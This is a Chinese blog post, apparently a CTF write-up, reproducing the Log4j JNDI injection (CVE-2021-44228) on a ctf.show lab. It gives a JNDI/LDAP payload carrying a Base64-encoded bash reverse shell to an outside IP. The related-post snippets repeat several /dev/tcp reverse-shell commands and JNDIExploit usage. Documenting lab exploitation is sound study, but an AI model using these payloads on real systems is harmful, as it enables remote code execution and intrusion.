Log4j复现

最新推荐文章于 2024-09-08 18:01:23 发布

HHJJTT330

最新推荐文章于 2024-09-08 18:01:23 发布

阅读量346

点赞数

文章标签：安全

本文链接：https://blog.youkuaiyun.com/qq_56150805/article/details/130250070

版权

该文章详细描述了如何复现Log4j安全漏洞的过程，包括准备VPS服务器，安装并运行LDAP服务器，设置特定payload，并通过Base64编码进行提交，最终获取到flag。这是一个关于网络安全和漏洞利用的实战教程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Log4j复现

靶场：ctf.show

原理流程：

复现：

1.准备好vps服务器

2.安装ldap服务器

3.开启ldap服务器

4.监听nc -lvnp 1099

5.设置playload

6.cd / 回车 cat ctfshowflag 可见flag： ctfshow{cd64d28e-e9d9-4636-837a-7447c989aa5e}

选择playload

${jndi:ldap://vps-ip:1389/Basic/Command/Base64/YmFzaCAtaSA%2bJiAvZGV2L3RjcC80My4xNDMuMTk2LjIwMi8xMk5IDA%2bJjE=}min //选择base64形式，注意将+号进行url编码

提交playload后页面

成功响应

得到flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

HHJJTT330

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

ctfshow log4j复现 wp|CVE-2021-44228

spring！

03-24

5065

ctfshow log4j复现 wp|CVE-2021-44228

log4j漏洞复现

zzf011900的博客

04-02

1019

2.0-2.14.1存在JNDI注入漏洞，导致攻击者可以控制日志内容的情况下，传入${jndi:ldap://xxxxxx.com/rce}的参数进行JNDI注入，执行远程命令。命令：bash -i > /dev/tcp/192.168.59.6/5555 2>&1 0>&1。精简版：bash -i >& /dev/tcp/192.168.59.6/5555 0>&1。/dev/tcp/192.168.59.6/5555 去连接59.6的5555端口。如:http ------web服务。

参与评论您还未登录，请先登录后发表或查看评论

ctfshow—web—Log4j复现

HAI_WD的博客

09-03

744

利用的话需要有一个vps，poc是：user=${jndi:ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho}这是一个log4j利用的环境，因为log4j本生就是一个jndi漏洞的利用，所以还是基本的jndi利用就可以了。欢迎大家关注我朋友的公众号皓月当空w 分享漏洞情报以及各种学习资源，技能树，面试题等。log4j的payload是：${jndi:ldap://}这里选取的工具是：JNDIExploit。

ctfshow-Log4j复现-log4j复现

wrypot的博客

08-21

915

另一个终端进入JNDIExploit-1.2-SNAPSHOT.jar所在的目录jndiexploit执行下面命令。1、买VPS，打开mobax进行ssh连接，开两个终端。

ctfshow Log4j复现wp

weixin_52829570的博客

01-14

3062

声明：该文章来自本人日常学习笔记，请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与本人无关 JNDIExploit 先将反弹shell的命令base64编码，然后将里面的+号和=号进行一次url编码注：IP填vps公网ip，PORT要和nc监听的端口对应 bash -i >& /dev/tcp/IP/PORT 0>&1 # => YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC9QT1JUIDA+JjE= # => Ym

[Log4j]CVE-2021-44228 CTFshow

krysyal的博客

03-31

3691

Log4j复现 CTFshow 复现参考文档1 复现参考文档2 环境 http://dcc43afd-8e07-4d9e-8bd2-b0a1c320a5b7.challenge.ctf.show/ 2.0 <= Apache log4j2 <= 2.14.1 简单来说，用户输入会记录在log4j中，而log4j自带lookup功能，格式为${parser:xxx}。如果用户输入lookup会被log4j解析。 jndi是parser的一种，是一种标准的Java命名系统接口，可以连接远程服务，格式

Apache Log4j2漏洞复现

qq_62056583的博客

07-20

957

复现并分析【CVE-2021044228】Apache Log4j2 Server 反序列化命令执行漏洞，使用docker技术搭建漏洞环境，在实验环境中复现该漏洞。

vulhub靶场log4j2漏洞复现

A2893992091的博客

09-08

417

java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[ 经过 base64 编码后的命令 ]}|{base64,-d}|bash" -A [你的 vpsip]开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动！拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址。漏洞编号：CVE-2021-44228。

log4j漏洞原理和靶场复现

Aiwin的博客

08-19

8262

log4j漏洞原理和靶场复现

[漏洞复现]log4j漏洞RCE(CVE-2021-44228)

weixin_43895765的博客

12-15

7770

由于排版问题，详情见个人博客文章???? log4j漏洞RCE(CVE-2021-44228)

Log4j2 RCE漏洞复现

守拙的博客

12-10

4569

最新log4j rce漏洞复现

log4j2复现试验

qq_41696858的博客

12-14

2249

之前bugku有一题是log4j2的复现，然后看到网上一个本地复现的帖子，那就拿这个帖子来做一个简单验证原文地址：https://bbs.wxctf.com/thread-622-1-1.html 只有两台机器：受害机ip：192.168.200.130：38080 攻击机：192.168.200.128（burpsuite，jndiexploit，nc）环境docker拉一下，访问192.168.200.130：38080看见error页面就说明起起来了说一下可能出错的地方，不要图省事，将dock

Log4j漏洞复现及原理（附github源码）

weixin_42478399的博客

02-15

5761

1.背景之前在公司收到Log4j2爆出一个重大漏洞，公司有大部分应用使用到了Log4j的2.14.0以下的版本，全公司内部程序员收到消息之后，加班加点升级Log4j的版本到2.14.1（这个版本也不稳定），在此记录一下。 2.Log4j的重大漏洞我们复现一下Log4j 2.14.0版本中出现的安全问题。首先，我们新建一个Maven项目，引入Log4j的jar包 <?xml version="1.0" encoding="UTF-8"?> <project xmlns="htt

log4j2漏洞简单复现

没有

06-06

3281

log4j2漏洞简单复现

Log4j复现过程

weixin_50339832的博客

12-26

2472

log4j是一个记录日志的组件，用来对程序状态进行动态记录， logger.info("system propety: ${jndi:schema://url}"); jndi:jndi解析器通过jdk获取内容，反序列化为java对象作为jndi，并打印，jndi就是这个从外部查找得到的java对象。 schema：获取方式，jdk支持多种不同的查找方式，包括 corbname, dns, iiop, iiopname, ldap, ldaps, rmi 因ldap写法简单，被作为常用的获取方式

利用Vulnhub复现漏洞 - Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）

JiangBuLiu的博客

07-12

6221

Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/log4j/CVE-2017-5645/ 漏洞原理 Apache Log4j是一个用于Java的日志记录库，其支持启动远程日志服务器。Apache Log...

【核弹级漏洞】Apache Log4j2 漏洞复现（CVE-2021-44228 ）包含源码